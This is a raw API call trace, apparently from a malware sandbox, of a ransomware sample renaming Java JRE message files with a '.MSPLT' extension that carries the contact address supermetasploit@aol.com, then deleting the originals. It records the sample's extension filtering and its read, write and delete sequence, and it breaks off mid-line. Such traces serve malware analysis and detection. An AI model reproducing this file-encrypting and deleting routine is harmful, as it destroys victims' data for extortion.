lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 68 [0299.489] lstrlenW (lpString=".1cd") returned 4 [0299.489] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0299.489] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 68 [0299.489] lstrlenW (lpString=".jpg") returned 4 [0299.489] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0299.489] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 68 [0299.489] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 68 [0299.489] lstrlenW (lpString=".doc") returned 4 [0299.489] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0299.489] lstrlenW (lpString=".docx") returned 5 [0299.490] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0299.490] lstrlenW (lpString=".pdf") returned 4 [0299.490] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0299.490] lstrlenW (lpString=".xls") returned 4 [0299.490] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0299.490] lstrlenW (lpString=".xlsx") returned 5 [0299.490] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0299.490] lstrlenW (lpString=".ppt") returned 4 [0299.490] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0299.490] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 68 [0299.490] lstrlenW (lpString=".zip") returned 4 [0299.490] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0299.490] lstrlenW (lpString=".rar") returned 4 [0299.490] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0299.490] lstrlenW (lpString=".bz2") returned 4 [0299.490] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0299.490] lstrlenW (lpString=".7z") returned 3 [0299.490] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0299.490] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 68 [0299.490] lstrlenW (lpString=".dbf") returned 4 [0299.490] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0299.490] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 68 [0299.490] lstrlenW (lpString=".1cd") returned 4 [0299.490] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0299.490] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 68 [0299.490] lstrlenW (lpString=".jpg") returned 4 [0299.490] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0299.491] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0299.491] lstrlenW (lpString="messages_ja.properties") returned 22 [0299.491] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0299.492] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=6349) returned 1 [0299.492] CloseHandle (hObject=0x464) returned 1 [0299.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties")) returned 0x20 [0299.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.493] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0299.493] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.493] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.493] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0299.494] GetLastError () returned 0x0 [0299.494] ReadFile (in: hFile=0x464, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x18cd, lpOverlapped=0x0) returned 1 [0299.497] WriteFile (in: hFile=0x470, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x18d0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x18d0, lpOverlapped=0x0) returned 1 [0299.498] ReadFile (in: hFile=0x464, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0299.498] WriteFile (in: hFile=0x470, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x100, lpOverlapped=0x0) returned 1 [0299.499] SetEndOfFile (hFile=0x470) returned 1 [0299.499] CloseHandle (hObject=0x470) returned 1 [0299.504] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.504] SetEndOfFile (hFile=0x464) returned 1 [0299.514] CloseHandle (hObject=0x464) returned 1 [0299.515] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0299.515] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties")) returned 1 [0299.516] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 68 [0299.516] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 68 [0299.516] lstrlenW (lpString=".doc") returned 4 [0299.516] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0299.516] lstrlenW (lpString=".docx") returned 5 [0299.516] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0299.516] lstrlenW (lpString=".pdf") returned 4 [0299.516] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0299.516] lstrlenW (lpString=".xls") returned 4 [0299.516] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0299.517] lstrlenW (lpString=".xlsx") returned 5 [0299.517] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0299.517] lstrlenW (lpString=".ppt") returned 4 [0299.517] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0299.517] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 68 [0299.517] lstrlenW (lpString=".zip") returned 4 [0299.517] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0299.517] lstrlenW (lpString=".rar") returned 4 [0299.517] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0299.517] lstrlenW (lpString=".bz2") returned 4 [0299.517] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0299.517] lstrlenW (lpString=".7z") returned 3 [0299.517] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0299.517] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 68 [0299.517] lstrlenW (lpString=".dbf") returned 4 [0299.517] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0299.517] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 68 [0299.517] lstrlenW (lpString=".1cd") returned 4 [0299.517] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0299.517] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 68 [0299.517] lstrlenW (lpString=".jpg") returned 4 [0299.517] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0299.517] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 68 [0299.517] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 68 [0299.517] lstrlenW (lpString=".doc") returned 4 [0299.517] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0299.517] lstrlenW (lpString=".docx") returned 5 [0299.518] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0299.518] lstrlenW (lpString=".pdf") returned 4 [0299.518] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0299.518] lstrlenW (lpString=".xls") returned 4 [0299.518] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0299.518] lstrlenW (lpString=".xlsx") returned 5 [0299.518] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0299.518] lstrlenW (lpString=".ppt") returned 4 [0299.518] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0299.518] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 68 [0299.518] lstrlenW (lpString=".zip") returned 4 [0299.518] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0299.518] lstrlenW (lpString=".rar") returned 4 [0299.518] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0299.518] lstrlenW (lpString=".bz2") returned 4 [0299.518] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0299.518] lstrlenW (lpString=".7z") returned 3 [0299.518] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0299.518] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 68 [0299.518] lstrlenW (lpString=".dbf") returned 4 [0299.518] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0299.518] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 68 [0299.518] lstrlenW (lpString=".1cd") returned 4 [0299.518] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0299.518] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 68 [0299.518] lstrlenW (lpString=".jpg") returned 4 [0299.518] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0299.519] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0299.519] lstrlenW (lpString="messages_ko.properties") returned 22 [0299.519] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0299.519] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=5712) returned 1 [0299.520] CloseHandle (hObject=0x464) returned 1 [0299.520] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties")) returned 0x20 [0299.520] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.852] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0300.352] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.352] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.352] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0300.509] GetLastError () returned 0x0 [0300.509] ReadFile (in: hFile=0x47c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x1650, lpOverlapped=0x0) returned 1 [0300.511] WriteFile (in: hFile=0x44c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x1660, lpOverlapped=0x0) returned 1 [0300.513] ReadFile (in: hFile=0x47c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0300.513] WriteFile (in: hFile=0x44c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x100, lpOverlapped=0x0) returned 1 [0300.513] SetEndOfFile (hFile=0x44c) returned 1 [0300.513] CloseHandle (hObject=0x44c) returned 1 [0300.515] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.515] SetEndOfFile (hFile=0x47c) returned 1 [0300.519] CloseHandle (hObject=0x47c) returned 1 [0300.519] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0300.521] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties")) returned 1 [0300.522] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 68 [0300.522] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 68 [0300.522] lstrlenW (lpString=".doc") returned 4 [0300.522] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0300.522] lstrlenW (lpString=".docx") returned 5 [0300.522] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0300.522] lstrlenW (lpString=".pdf") returned 4 [0300.522] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0300.522] lstrlenW (lpString=".xls") returned 4 [0300.522] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0300.522] lstrlenW (lpString=".xlsx") returned 5 [0300.522] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0300.522] lstrlenW (lpString=".ppt") returned 4 [0300.522] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0300.522] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 68 [0300.522] lstrlenW (lpString=".zip") returned 4 [0300.522] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0300.522] lstrlenW (lpString=".rar") returned 4 [0300.522] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0300.522] lstrlenW (lpString=".bz2") returned 4 [0300.522] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0300.522] lstrlenW (lpString=".7z") returned 3 [0300.523] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0300.523] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 68 [0300.523] lstrlenW (lpString=".dbf") returned 4 [0300.523] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0300.523] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 68 [0300.523] lstrlenW (lpString=".1cd") returned 4 [0300.523] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0300.523] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 68 [0300.523] lstrlenW (lpString=".jpg") returned 4 [0300.523] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0300.523] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 68 [0300.523] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 68 [0300.523] lstrlenW (lpString=".doc") returned 4 [0300.523] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0300.523] lstrlenW (lpString=".docx") returned 5 [0300.523] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0300.523] lstrlenW (lpString=".pdf") returned 4 [0300.523] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0300.523] lstrlenW (lpString=".xls") returned 4 [0300.523] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0300.523] lstrlenW (lpString=".xlsx") returned 5 [0300.523] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0300.523] lstrlenW (lpString=".ppt") returned 4 [0300.523] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0300.523] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 68 [0300.524] lstrlenW (lpString=".zip") returned 4 [0300.524] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0300.524] lstrlenW (lpString=".rar") returned 4 [0300.524] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0300.524] lstrlenW (lpString=".bz2") returned 4 [0300.524] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0300.524] lstrlenW (lpString=".7z") returned 3 [0300.524] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0300.524] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 68 [0300.524] lstrlenW (lpString=".dbf") returned 4 [0300.524] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0300.524] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 68 [0300.524] lstrlenW (lpString=".1cd") returned 4 [0300.524] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0300.524] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 68 [0300.524] lstrlenW (lpString=".jpg") returned 4 [0300.524] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0300.524] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0300.524] lstrlenW (lpString="messages_sv.properties") returned 22 [0300.524] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0300.526] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=3409) returned 1 [0300.526] CloseHandle (hObject=0x47c) returned 1 [0300.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties")) returned 0x20 [0300.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0300.526] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0300.528] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.528] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.528] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0300.528] GetLastError () returned 0x0 [0300.529] ReadFile (in: hFile=0x47c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0xd51, lpOverlapped=0x0) returned 1 [0300.531] WriteFile (in: hFile=0x44c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xd60, lpOverlapped=0x0) returned 1 [0300.532] ReadFile (in: hFile=0x47c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0300.532] WriteFile (in: hFile=0x44c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x100, lpOverlapped=0x0) returned 1 [0300.532] SetEndOfFile (hFile=0x44c) returned 1 [0300.533] CloseHandle (hObject=0x44c) returned 1 [0300.534] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0300.534] SetEndOfFile (hFile=0x47c) returned 1 [0300.539] CloseHandle (hObject=0x47c) returned 1 [0300.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0300.540] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties")) returned 1 [0300.541] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 68 [0300.541] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 68 [0300.541] lstrlenW (lpString=".doc") returned 4 [0300.541] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0300.541] lstrlenW (lpString=".docx") returned 5 [0300.541] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0300.541] lstrlenW (lpString=".pdf") returned 4 [0300.541] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0300.541] lstrlenW (lpString=".xls") returned 4 [0300.541] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0300.541] lstrlenW (lpString=".xlsx") returned 5 [0300.541] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0300.541] lstrlenW (lpString=".ppt") returned 4 [0300.541] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0300.541] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 68 [0300.541] lstrlenW (lpString=".zip") returned 4 [0300.541] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0300.542] lstrlenW (lpString=".rar") returned 4 [0300.542] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0300.542] lstrlenW (lpString=".bz2") returned 4 [0300.542] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0300.542] lstrlenW (lpString=".7z") returned 3 [0300.542] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0300.542] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 68 [0300.542] lstrlenW (lpString=".dbf") returned 4 [0300.542] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0300.542] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 68 [0300.542] lstrlenW (lpString=".1cd") returned 4 [0300.542] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0300.542] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 68 [0300.542] lstrlenW (lpString=".jpg") returned 4 [0300.542] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0300.542] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 68 [0300.542] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 68 [0300.542] lstrlenW (lpString=".doc") returned 4 [0300.542] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0300.542] lstrlenW (lpString=".docx") returned 5 [0300.542] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0300.542] lstrlenW (lpString=".pdf") returned 4 [0300.542] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0300.542] lstrlenW (lpString=".xls") returned 4 [0300.543] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0300.543] 